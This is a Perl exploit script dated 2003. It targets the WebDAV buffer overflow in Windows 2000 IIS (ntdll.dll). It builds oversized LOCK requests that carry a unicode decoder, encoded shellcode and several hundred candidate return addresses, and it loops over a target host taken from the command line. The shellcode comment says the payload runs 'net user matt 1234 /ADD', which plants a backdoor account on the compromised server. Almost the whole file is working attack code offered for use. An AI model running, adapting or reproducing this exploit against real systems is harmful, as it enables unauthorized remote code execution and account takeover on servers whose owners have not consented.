#!/bin/perl
#
# 2003.3.24
#
# mat@monkey.org
# mat@panicsecurity.org
#
# tested on Windows 2000 Advanced Server SP3: Korean language edition
# ntdll.dll with 2002.7.3 version
# You need to change some parameters to make this exploit work on your platform of choice
#
# This exploit uses unicode decoder scheme and self-modifies unicoded shellcode to original one.
#
use Socket;
if($#ARGV<0)
{
die "usage: wd.pl <target hostname>\n";
}
my $host=$ARGV[0];
my $url_len=65514;
#LOCK: 65514
#SEARCH: 65535
my $host_header="Host: $host\r\n";
my $translate_f="Translate: f\r\n";
$translate_f="";
my $port=80;
my $depth="Depth: 1\r\n";
$depth="";
my $connection_str="Connection: Close\r\n";
$connection_str="";
my $url2="B";
$url2="";
my $cont="C";
my $lock_token="Lock-Token: $cont\r\n";
$lock_token="";
my $destination="Destination: /$url2\r\n";
$destination="";
# LoadLibrary: 0x100107c;
# GetProcAddress 0x1001034;
# WinExec("net user matt 1234 /ADD")
# this shellcode is encoded to printable string form
my $shellcode="\x34\x34\x30\x2e\x2c\x2a\x61\x62\x48\x48\x2a\x2a\x2c\x2d\x7f\x80\x68\x69\x2c\x2c\x18\x19\x64\x65\x58\x59\x0c\x07%u0411%u00f0\x67\x67\x2c\x2a\x31\x2e\x18\x19\x64\x65\x58\x59\x7e\x7f\x56\x56\x1a\x1a\x4c\x4d\x55\x55\x71\x71\x7d\x7d\x38\x39\x4c\x4d\x4c\x4d\x4c\x4d\x4c\x4d\x62\x62\x0c\x0c\x3b\x39\x4e\x4e\x6c\x6d\x6c\x6d\x4c\x4d\x38\x38\x5f\x60\x4c\x4d\x4c\x4d\x4c\x4d\x64\x64\x67\x68\x78\x79\x72\x73\x44\x45\x4c\x4d\x4c\x4c\x61\x62\x33\x33\x45\x46\x08\x08\x2d\x2d\x60\x60\x08\x08\x33\x34\x64\x64\x67\x68\x65\x65\x78\x79\x56\x57\x44\x45\x4c\x4d\x4c\x4c\x61\x62\x33\x33\x45\x46\x64\x65\x1a\x1b\x0e\x0f\x2c\x2d\x76\x76\x31\x31\x60\x61\x19\x19\x60\x60\x3d\x3e\x3b\x38\x2d\x2d\x0c\x08\x16\x16\x07\x08\x6c\x6d\x6c\x6d\x4c\x4d\x0c\x08\x12\x12\x03\x03\x6c\x6d\x6c\x6d\x4c\x4d\x79\x7a\x4f\x50\x60\x60\x38\x39\x31\x2e\x33\x33\x33\x33\x33\x33\x54\x54\x27\x24\x65\x66\x08\x08\x3b\x38\x0c\x0c\x2d\x2e\x29\x29\x6c\x6d\x6c\x6d\x4c\x4d\x65\x66\x33\x33\x06\x06\x03\x03\x6c\x6d\x6c\x6d\x4c\x4d\x33\x33\x16\x16\x38\x38\x6c\x6d\x6c\x6d\x4c\x4d\x08\x08\x39\x39\x0c\x0c\x2d\x2d\x3b\x39\x6c\x6d\x6c\x6d\x4c\x4d\x65\x65\x64\x65\x08\x08\x2d\x2d\x33\x33\x06\x06\x1d\x1d\x6c\x6d\x6c\x6d\x4c\x4d\x65\x65\x33\x33\x06\x06\x1f\x1f\x6c\x6d\x6c\x6d\x4c\x4d\x54\x54\x27\x24\x04\x05\x04\x05\x65\x66\x08\x08\x3b\x38\x0c\x0c\x2d\x2e\x27\x27\x6c\x6d\x6c\x6d\x4c\x4d\x65\x66\x33\x33\x06\x06\x19\x19\x6c\x6d\x6c\x6d\x4c\x4d\x33\x33\x06\x06\x1b\x1b\x6c\x6d\x6c\x6d\x4c\x4d\x69\x69\x6e\x6e\x65\x66\x6b\x6c\x6e\x6e\x6a\x6b\x55\x55\x55\x56\x4c\x4d\x63\x63\x7a\x7b\x7d\x7d\x75\x76\x7e\x7e\x7c\x7c\x76\x77\x4c\x4d\x63\x63\x7a\x7b\x77\x77\x75\x76\x78\x78\x76\x77\x7e\x7e\x4c\x4d\x63\x63\x7a\x7b\x7d\x7d\x7a\x7b\x7b\x7b\x75\x75\x7e\x7e\x4c\x4d\x67\x67\x78\x78\x7b\x7c\x6e\x6e\x70\x71\x7e\x7e\x7d\x7d\x4c\x4d\x6e\x6e\x70\x71\x78\x78\x76\x77\x64\x65\x75\x76\x7b\x7b\x7d\x7d\x7e\x7e\x75\x75\x75\x75\x4c\x4d\x7d\x7d\x51\x52\x62\x63\x76\x77\x5d\x5a\x7e\x7e\x70\x71\x7e\x7e\x4c\x4d\x4c\x4d\x4c\x4d\x4c\x4d\x7b\x7c\x7e\x7e\x76\x77\x5e\x5b\x76\x76\x75\x75\x7e\x7e\x75\x76\x5e\x5b\x7a\x7a\x7c\x7c\x76\x77\x76\x77\x5e\x5b\x54\x54\x55\x56\x55\x55\x56\x57\x5e\x5b\x5b\x5b\x7c\x7c\x7e\x7f\x7e\x7f\x4c\x4d\x4c\x4d\x4c\x4d\x4c\x4d\x76\x77\x5d\x5a\x7e\x7e\x70\x71\x7e\x7e\x4c\x4d\x4e\x4e\x4c\x4d\x4c\x4d\x4c\x4d\x76\x77\x7e\x7e\x75\x75\x76\x77\x49\x4a";
my $body="<?xml version=\"1.0\">\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n";
my $length_of_body=length($body);
#
# jmp ebx,call ebx addresses
#
my @return_addresses=(
"%u32ac%u77e2",
"%uc1b5%u76ae",
"%u005d%u77a5",
"%u0060%u776b",
"%u00b4%u77a5",
"%u00e6%u77ac",
"%u014a%u7766",
"%u0392%u7511",
"%u03a0%u7511",
"%u0900%u6df1",
"%u0900%u778b",
"%u1167%u6b32",
"%u1184%u6ed4",
"%u1192%u6b3e",
"%u11b1%u779e",
"%u11b9%u777f",
"%u11b9%u782c",
"%u11d3%u7834",
"%u1800%u749e",
"%u20ac%u777f",
"%u215c%u777e",
"%u2171%u7766",
"%u2172%u6b3a",
"%u2191%u6e6f",
"%u21d4%u6e6f",
"%u2283%u730a",
"%u24b9%u7763",
"%u24d5%u7763",
"%u24e8%u7761",
"%u2503%u7834",
"%u2514%u77e2",
"%u251e%u77db",
"%u2521%u7761",
"%u2527%u77db",
"%u2530%u77db",
"%u253c%u77e2",
"%u2547%u77dc",
"%u2592%u77dc",
"%u266d%u76ae",
"%u2e00%u76ae",
"%u300e%u74da",
"%u300e%u74e3",
"%u306c%u7766",
"%u30a5%u77e5",
"%u30b0%u77e5",
"%u327b%u6e44",
"%u327b%u6e5e",
"%u329b%u6e44",
"%u329b%u6e5e",
"%u329c%u77e2",
"%u3384%u7779",
"%u3384%u777e",
"%u3397%u6e00",
"%u33d0%u76ae",
"%u3700%u777f",
"%u4e5e%u7900",
"%u4ea4%u7325",
"%u4ec0%u77db",
"%u4ef2%u77ac",
"%u4f73%u749f",
"%u4fd4%u77dc",
"%u4ff1%u749f",
"%u5023%u749f",
"%u5078%u77a5",
"%u5112%u77dc",
"%u5121%u749f",
"%u5144%u77dc",
"%u5146%u77e2",
"%u514e%u77ac",
"%u518d%u6dee",
"%u51c4%u7387",
"%u5237%u77ac",
"%u52a0%u777f",
"%u52a0%u782c",
"%u52d5%u777f",
"%u52d5%u782c",
"%u52f8%u7800",
"%u5339%u6b3a",
"%u5339%u777f",
"%u5366%u7740",
"%u555e%u741b",
"%u5653%u749e",
"%u5718%u6c7e",
"%u574d%u7901",
"%u5775%u7901",
"%u5806%u7325",
"%u5821%u777f",
"%u5821%u782c",
"%u5831%u777f",
"%u5831%u782c",
"%u587c%u777f",
"%u587c%u782c",
"%u58c5%u777f",
"%u58d5%u777f",
"%u58fd%u777f",
"%u58fd%u782c",
"%u5949%u72fc",
"%u5949%u777f",
"%u5955%u72fc",
"%u5967%u777f",
"%u5997%u777f",
"%u5997%u782c",
"%u59bb%u777e",
"%u59d4%u777e",
"%u5a25%u777f",
"%u5a25%u782c",
"%u5ac9%u777f",
"%u5b5a%u6c7e",
"%u5b64%u777f",
"%u5b8f%u6731",
"%u5b9c%u6731",
"%u5b9c%u6e44",
"%u5c04%u777f",
"%u5c0f%u6c7e",
"%u5c3b%u777f",
"%u5c3b%u782c",
"%u5c4e%u6c7e",
"%u5cfb%u76ae",
"%u5da0%u7511",
"%u5da2%u777f",
"%u5de6%u77e5",
"%u5deb%u777f",
"%u5deb%u782c",
"%u5e00%u6c11",
"%u5e0c%u7325",
"%u5e2b%u777f",
"%u5e3f%u7511",
"%u5e55%u777f",
"%u5e63%u7325",
"%u5eb8%u7325",
"%u5ef7%u7325",
"%u5f13%u7325",
"%u5f17%u77e3",
"%u5f1b%u777f",
"%u5f1b%u782c",
"%u5f62%u7325",
"%u5f7f%u72fc",
"%u5f99%u7325",
"%u5fb7%u6c11",
"%u5fcc%u7763",
"%u601d%u77dc",
"%u609a%u7387",
"%u60f6%u72fc",
"%u611f%u77bf",
"%u6144%u74da",
"%u6144%u74e3",
"%u6198%u7763",
"%u61a9%u74da",
"%u61a9%u74e3",
"%u61fa%u66c7",
"%u61fa%u671b",
"%u620a%u7325",
"%u6284%u66c7",
"%u62c8%u7763",
"%u62db%u72fc",
"%u62f1%u72fc",
"%u63a9%u77bc",
"%u63ed%u779e",
"%u64bb%u7761",
"%u64c1%u72fd",
"%u64e2%u777f",
"%u64e2%u782c",
"%u64f4%u777f",
"%u65b9%u6ed4",
"%u6600%u6ed4",
"%u66a0%u6c6d",
"%u66b3%u6c6d",
"%u66f3%u6c6d",
"%u66f8%u7387",
"%u674f%u7763",
"%u67b0%u7740",
"%u67b3%u6ed4",
"%u67d2%u749e",
"%u6816%u6ed4",
"%u6842%u779e",
"%u6881%u779e",
"%u6894%u779e",
"%u68b3%u777e",
"%u6977%u76ae",
"%u6a19%u7763",
"%u6a44%u7763",
"%u6aa3%u7518",
"%u6c60%u77bc",
"%u6c81%u7693",
"%u6c82%u77bf",
"%u6c92%u77bc",
"%u6cb8%u7693",
"%u6cdb%u777f",
"%u6ce5%u777f",
"%u6ceb%u7693",
"%u6d11%u777f",
"%u6d11%u782c",
"%u6d87%u77dc",
"%u6d89%u7693",
"%u6e2f%u7693",
"%u6e4d%u76ae",
"%u6f94%u77e9",
"%u6fae%u77bc",
"%u6fe9%u749e",
"%u7006%u77e9",
"%u7028%u7901",
"%u70ab%u77ac",
"%u70ac%u7387",
"%u70dd%u77ac",
"%u70dd%u784f",
"%u70fd%u77bb",
"%u711a%u6731",
"%u7199%u7387",
"%u71d0%u77bb",
"%u71fc%u77bb",
"%u722d%u6df3",
"%u7258%u7515",
"%u725f%u77db",
"%u72a2%u77a5",
"%u72c4%u7325",
"%u73fe%u6ed4",
"%u745f%u76ae",
"%u748b%u730a",
"%u74d8%u6df3",
"%u74e3%u6df3",
"%u7575%u7518",
"%u7642%u6c0f",
"%u76de%u7325",
"%u7704%u7325",
"%u77dc%u7693",
"%u78a9%u77e2",
"%u78bb%u77bb",
"%u790e%u6995",
"%u797a%u6995",
"%u79b1%u6995",
"%u79b1%u7740",
"%u79d1%u77bb",
"%u79e7%u6995",
"%u79e9%u72fd",
"%u7a00%u78fb",
"%u7a05%u72fd",
"%u7a3b%u72fd",
"%u7a57%u7387",
"%u7aba%u6995",
"%u7af9%u6c13",
"%u7b19%u76ae",
"%u7b6e%u777f",
"%u7b6e%u782c",
"%u7c83%u7763",
"%u7c97%u7763",
"%u7ca5%u7763",
"%u7d8f%u77e5",
"%u7dbe%u779e",
"%u7de1%u779e",
"%u7e1f%u6df1",
"%u7e1f%u778b",
"%u7e52%u6995",
"%u7f55%u77a5",
"%u7fa8%u77a5",
"%u7fd5%u76ae",
"%u8018%u775b",
"%u807d%u7387",
"%u80a5%u775b",
"%u8178%u775b",
"%u81c0%u77db",
"%u82ad%u6c11",
"%u82d5%u65f1",
"%u832f%u77db",
"%u8339%u76ae",
"%u83d3%u6df3",
"%u843d%u7387",
"%u8563%u77ac",
"%u8805%u7740",
"%u881f%u77db",
"%u8840%u77bc",
"%u8892%u7740",
"%u8892%u77ac",
"%u8a23%u6731",
"%u8a23%u7693",
"%u8a23%u77ad",
"%u8af1%u76ae",
"%u8b17%u6ed4",
"%u8b39%u76ae",
"%u8c6b%u77bf",
"%u8c7a%u77bc",
"%u8ca2%u77bc",
"%u8cac%u6df1",
"%u8cac%u778b",
"%u8d70%u6995",
"%u8dbe%u7740",
"%u8dcb%u77ad",
"%u8dcf%u777e",
"%u8e87%u6995",
"%u8f09%u6b32",
"%u9187%u76ae",
"%u925e%u749e",
"%u92f8%u77ad",
"%u932e%u76ae",
"%u93ac%u7740",
"%u9640%u6995",
"%u980a%u7763",
"%u984e%u6df3",
"%u985e%u7763",
"%u98dc%u7740",
"%u9920%u7916",
"%u9957%u77a5",
"%u9a5a%u779e",
"%u9b27%u6ed3",
"%u9cf6%u7518",
"%u9d26%u7518",
"%u9d5d%u7300",
"%u9d72%u7763",
"%u9edc%u7901",
"%u9ede%u77e9",
"%ua300%u76ae",
"%uac16%u7900",
"%uac17%u77db",
"%uac17%u7832",
"%uac4b%u77db",
"%uac4b%u7900",
"%uac52%u76ae",
"%uac5a%u76ae",
"%uac71%u7693",
"%uac84%u77e9",
"%uac97%u77e3",
"%uaca2%u6ed3",
"%uaca4%u6c0f",
"%uaca4%u77e9",
"%uacac%u6c0f",
"%uacaf%u77e3",
"%uacb6%u6ed3",
"%uacc8%u7693",
"%uace0%u7761",
"%uacfb%u7761",
"%uad0d%u77e2",
"%uad13%u7900",
"%uad18%u779e",
"%uad25%u7900",
"%uad27%u6ed3",
"%uad45%u77e2",
"%uad5b%u7900",
"%uad5f%u7387",
"%uad73%u6995",
"%uad73%u6b32",
"%uad7a%u6b32",
"%uada6%u775b",
"%uadab%u7900",
"%uadc4%u7387",
"%uadf0%u76ae",
"%uadf9%u6995",
"%uae12%u76ae",
"%uae80%u77e5",
"%uae96%u77e5",
"%uaf17%u77e3",
"%uafa2%u779e",
"%ub00a%u77e5",
"%ub05d%u77e5",
"%ub0c0%u6b32",
"%ub0ef%u7518",
"%ub100%u6b32",
"%ub100%u7518",
"%ub119%u7518",
"%ub138%u672e",
"%ub169%u6b32",
"%ub177%u672e",
"%ub181%u6b32",
"%ub1cb%u6ed4",
"%ub1da%u6ed4",
"%ub206%u6b32",
"%ub216%u6c0f",
"%ub23f%u7802",
"%ub240%u7693",
"%ub246%u6c0f",
"%ub260%u7693",
"%ub273%u76ae",
"%ub276%u6c0f",
"%ub27e%u779e",
"%ub288%u76ae",
"%ub293%u77e2",
"%ub29c%u72fd",
"%ub2a3%u6c0f",
"%ub2b7%u72fd",
"%ub2ca%u77e2",
"%ub2ef%u76ae",
"%ub342%u76ae",
"%ub3a2%u749e",
"%ub3b8%u749e",
"%ub3be%u749e",
"%ub3c3%u741b",
"%ub3f4%u741b",
"%ub405%u7802",
"%ub43a%u76ae",
"%ub44e%u6df1",
"%ub44e%u778b",
"%ub450%u76ae",
"%ub456%u6df1",
"%ub456%u778b",
"%ub468%u6ed3",
"%ub483%u76ae",
"%ub484%u72fd",
"%ub48b%u72fd",
"%ub498%u76ae",
"%ub4a6%u6995",
"%ub4af%u76ae",
"%ub4c0%u76ae",
"%ub4e8%u7832",
"%ub52d%u6995",
"%ub549%u77db",
"%ub554%u6995",
"%ub565%u77db",
"%ub56e%u77e9",
"%ub61d%u7763",
"%ub61f%u77e9",
"%ub62c%u7763",
"%ub652%u77e9",
"%ub65e%u77e9",
"%ub66a%u77e9",
"%ub6a4%u77db",
"%ub6a7%u7900",
"%ub6af%u6ed4",
"%ub6b7%u6ed4",
"%ub6b8%u77db",
"%ub6d5%u7900",
"%ub6dd%u77ad",
"%ub6dd%u77b0",
"%ub6ec%u77ad",
"%ub6ec%u77b0",
"%ub6f4%u77ad",
"%ub6f4%u77b0",
"%ub6f7%u7763",
"%ub6fc%u749e",
"%ub70e%u77ad",
"%ub712%u749e",
"%ub718%u749e",
"%ub778%u77e9",
"%ub784%u77e9",
"%ub790%u77e9",
"%ub79c%u77e9",
"%ub7a8%u77e9",
"%ub7ac%u77ad",
"%ub7b4%u77e9",
"%ub7c0%u77e9",
"%ub7cc%u77e9",
"%ub7d8%u77e9",
"%ub803%u775b",
"%ub819%u77ad",
"%ub992%u7763",
"%ub9aa%u7832",
"%ub9ce%u7763",
"%ub9d6%u7832",
"%uba10%u7832",
"%uba38%u7832",
"%uba6b%u77ad",
"%uba6b%u77b0",
"%uba73%u77ac",
"%uba74%u77ad",
"%uba74%u77b0",
"%uba7a%u77ad",
"%uba7a%u77b0",
"%uba7e%u77ad",
"%uba7e%u77b0",
"%uba8e%u7834",
"%uba9f%u7900",
"%ubaa8%u7834",
"%ubaae%u6876",
"%ubae8%u7900",
"%ubb34%u6876",
"%ubc0f%u77e5",
"%ubc37%u77e5",
"%ubcf9%u7834",
"%ubd00%u6c0f",
"%ubd24%u7834",
"%ubd38%u6c0f",
"%ubd65%u6c0f",
"%ubdb3%u672e",
"%ubdc8%u7740",
"%ubde6%u77db",
"%ube03%u672e",
"%ube1a%u7740",
"%ube30%u7901",
"%ube31%u77e5",
"%ube43%u7901",
"%ube53%u6995",
"%ube65%u77db",
"%ube75%u77e5",
"%ube87%u77db",
"%ubebd%u77db",
"%ubecf%u6995",
"%ubef8%u6995",
"%ubf37%u7834",
"%ubf45%u7834",
"%ubf65%u76ae",
"%ubf83%u7900",
"%ubf8a%u6995",
"%ubf92%u7900",
"%ubf9e%u7900",
"%ubfaa%u7900",
"%ubfba%u76ae",
"%ubfbf%u6c7e",
"%ubfc5%u77db",
"%ubfd2%u7900",
"%ubfe1%u7900",
"%ubfed%u7900",
"%ubff9%u7900",
"%uc003%u76ae",
"%uc02e%u77db",
"%uc02f%u77db",
"%uc036%u6995",
"%uc03a%u77db",
"%uc03e%u6c7e",
"%uc03f%u6995",
"%uc054%u76ae",
"%uc058%u6c7e",
"%uc0d5%u76ae",
"%uc0ee%u76ae",
"%uc120%u76ae",
"%uc142%u76ae",
"%uc189%u65f1",
"%uc1bc%u65f1",
"%uc1ef%u65f1",
"%uc1f3%u6b32",
"%uc1f7%u77e2",
"%uc21f%u6b32",
"%uc268%u76ae",
"%uc268%u77e2",
"%uc277%u76ae",
"%uc27f%u7834",
"%uc286%u76ae",
"%uc291%u77e2",
"%uc295%u76ae",
"%uc2a8%u76ae",
"%uc2d1%u76ae",
"%uc2e0%u76ae",
"%uc2ef%u76ae",
"%uc2fe%u76ae",
"%uc306%u7834",
"%uc30d%u76ae",
"%uc32a%u7834",
"%uc344%u7834",
"%uc35e%u7834",
"%uc39d%u6ed4",
"%uc3de%u6ed4",
"%uc3df%u6df1",
"%uc3df%u778b",
"%uc401%u7834",
"%uc445%u7834",
"%uc449%u6df1",
"%uc449%u778b",
"%uc459%u7834",
"%uc4f0%u7834",
"%uc504%u77dc",
"%uc56b%u7834",
"%uc578%u77e9",
"%uc57a%u6c0f",
"%uc583%u76ae",
"%uc597%u76ae",
"%uc5d6%u77ac",
"%uc5d7%u77ac",
"%uc5e1%u77ac",
"%uc5eb%u77ac",
"%uc663%u76ae",
"%uc676%u6e44",
"%uc676%u6e5e",
"%uc677%u76ae",
"%uc6f3%u6c42",
"%uc748%u76ae",
"%uc776%u76ae",
"%uc7a0%u77e2",
"%uc7da%u6b32",
"%uc7e1%u6b32",
"%uc7e5%u77e2",
"%uc860%u72c2",
"%uc860%u775b",
"%uc86d%u72c2",
"%uc86d%u775b",
"%uc87d%u72c2",
"%uc87d%u775b",
"%uc88d%u72c2",
"%uc88d%u775b",
"%uc89d%u72c2",
"%uc89d%u775b",
"%uc8ad%u72c2",
"%uc8ad%u775b",
"%uc8ba%u72c2",
"%uc8ba%u775b",
"%uc8c7%u72c2",
"%uc8c7%u775b",
"%uc8d4%u72c2",
"%uc8d4%u775b",
"%uc8e0%u77ac",
"%uc8fc%u77db",
"%uc936%u77db",
"%uc9d3%u77ac",
"%uc9f5%u6c0f",
"%uca02%u77ac",
"%uca25%u77ac",
"%uca2e%u6c0f",
"%uca5b%u77e9",
"%uca84%u77e9",
"%ucad1%u77e9",
"%ucaf1%u77e9",
"%ucb4f%u749e",
"%ucb72%u76ae",
"%ucb7a%u751a",
"%ucb7b%u76ae",
"%ucb7e%u7763",
"%ucb85%u7763",
"%ucb8f%u751a",
"%ucb98%u749e",
"%ucba4%u751a",
"%ucbae%u749f",
"%ucbd0%u77db",
"%ucc05%u749f",
"%ucc53%u76ae",
"%ucc81%u6df5",
"%ucc89%u6df5",
"%ucc8a%u76ae",
"%uccb5%u7901",
"%uccc7%u760d",
"%uccd6%u741b",
"%uccda%u760d",
"%ucd00%u741b",
"%ucd0f%u7901",
"%ucd2a%u741b",
"%ucd31%u7901",
"%ucd3c%u7518",
"%ucd3c%u7901",
"%ucdb0%u7761",
"%ucdb5%u7761",
"%ucdb8%u7761",
"%ucdf4%u741b",
"%ucdf9%u77e5",
"%uce2e%u7518",
"%uce46%u741b",
"%uce6a%u77e5",
"%uce74%u7518",
"%uce93%u77e5",
"%uce98%u7518",
"%ucf69%u6df5",
"%ucf71%u6df5",
"%ucf9c%u76ae",
"%ucfa6%u76ae",
"%ud067%u77db",
"%ud0a2%u77db",
"%ud0c5%u6b32",
"%ud109%u6b32",
"%ud11b%u77dc",
"%ud163%u7901",
"%ud17c%u7900",
"%ud181%u7900",
"%ud1a6%u749f",
"%ud1d2%u77ac",
"%ud1e0%u7901",
"%ud1ed%u77ac",
"%ud1f7%u749f",
"%ud1f7%u7900",
"%ud1fc%u7900",
"%ud206%u7763",
"%ud21c%u7834",
"%ud221%u7763",
"%ud225%u7834",
"%ud259%u6df5",
"%ud279%u749f",
"%ud287%u7834",
"%ud290%u7834",
"%ud2b6%u77e5",
"%ud2cd%u7900",
"%ud2d2%u7900",
"%ud2e1%u741b",
"%ud2f5%u741b",
"%ud2f5%u77e5",
"%ud309%u741b",
"%ud31d%u741b",
"%ud38a%u7901",
"%ud3aa%u7763",
"%ud3b9%u7763",
"%ud3bf%u7901",
"%ud3d7%u7763",
"%ud3db%u77dc",
"%ud4f5%u6b32",
"%ud514%u77ac",
"%ud51e%u77ac",
"%ud52d%u77e5",
"%ud539%u6b32",
"%ud541%u6df5",
"%ud545%u7800",
"%ud6dc%u77d7",
"%ud6e2%u77a5",
"%ud700%u77e2",
"%ud75b%u7900",
"%ud780%u7900",
"%ue00e%u7900",
"%ue010%u7738",
"%ue020%u77db",
"%ue02b%u77ac",
"%ue04c%u7738",
"%ue04e%u6ed4",
"%ue056%u6ed4",
"%ue0ad%u779e",
"%ue0af%u7800",
"%uec00%u672e",
"%uf906%u7800",
"%uf909%u7763",
"%uf93f%u7763",
"%uf942%u751a",
"%uf94b%u77e9",
"%uf964%u77ac",
"%uf966%u7763",
"%uf968%u751a",
"%uf974%u77ac",
"%uf981%u751a",
"%uf991%u7763",
"%uf9a6%u7300",
"%uf9b3%u751a",
"%uf9c2%u7763",
"%uf9cd%u751a",
"%uf9e9%u7763",
"%uf9fb%u7300"
);
foreach my $return_address (@return_addresses)
{
######### return address ############
my $return_address_part="";
$return_address_part="";
$return_address_part.="%u3073";
$return_address_part.="%u3075";
$return_address_part.="%u3074";
$return_address_part.=$return_address;
$return_address_part.="%ucc38"x22;
#####################################
############ offsets ##############
my $offset_len=280;
my $offset_part="X"x$offset_len;
#####################################
my $shellcode_len=$url_len-(length($return_address_part)/6+$offset_len);
my $offset_of_part_shell=0;
print "len-> $url_len=$shellcode_len:$offset_len\n";
my $decoder_str="%uC931%u79B1%uc1fe%ucb01%uc38b%uc789%uc289%uc931%u9041%u9041%uc38b%uc801%u338b%uce8b%u308b%uc68b%uc801%u00b4%uc689%uc78b%u3089%uc931%u03b1%u9041%ucb01%u9047%uf989%ud129%uc031%ue0b0%u03b4%uc129%uc985%uca75%uc985";
my $decoder_str_len=length($decoder_str)/6;
my $patch_esp="\x44\x45\x76\x76";
my $nop="%u0048%u0048";
my $encoded_str="${nop}${patch_esp}${shellcode}";
my $unicoded_encoded_str_len=4*5;
my $shellcode_part="";
$shellcode_part="";
$shellcode_part.=$decoder_str;
$shellcode_part.=$encoded_str;
$shellcode_part.="A"x($shellcode_len-($decoder_str_len+length($encoded_str)-$unicoded_encoded_str_len-1));
my $url="/${offset_part}${return_address_part}${shellcode_part}";
for my $METHOD ("LOCK")
{
my $string_to_send="$METHOD $url HTTP/1.1\r\n${host_header}${destination}${lock_token}${translate_f}${depth}Content-Type: text/xml\r\nContent-Length: $length_of_body\r\n${connection_str}\r\n${body}";
my $results="";
$results="";
while($results eq "")
{
print STDERR "Retrying Connection...\n";
$results=sendraw2("GET / HTTP/1.0\r\n\r\n",$host,$port,15);
if($results eq "")
{
sleep(1);
}
}
print STDERR "Trying with [$return_address]\n";
$results=sendraw2($string_to_send,$host,$port,15);
if($results eq "")
{
print "Connection refused: Server crashed?\n";
}else{
print "Failed to exploit: Server not crashed\n";
}
}
}
sub sendraw2
{
my ($pstr,$realip,$realport,$timeout)=@_;
my $target2=inet_aton($realip);
my $flagexit=0;
$SIG{ALRM}=\&ermm;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || return "0";
#die("Socket problems");
alarm($timeout);
if(connect(S,pack "SnA4x8",2,$realport,$target2))
{
alarm(0);
my @in;
select(S); $|=1;
print $pstr;
alarm($timeout);
while(<S>){
if($flagexit == 1)
{
close (S);
return "Timeout";
}
push @in, $_;
}
alarm(0);
select(STDOUT);
close(S);
return join '',@in;
}else{
close(S);
return "";
}
}
sub ermm
{
$flagexit=1;
close (S);
}
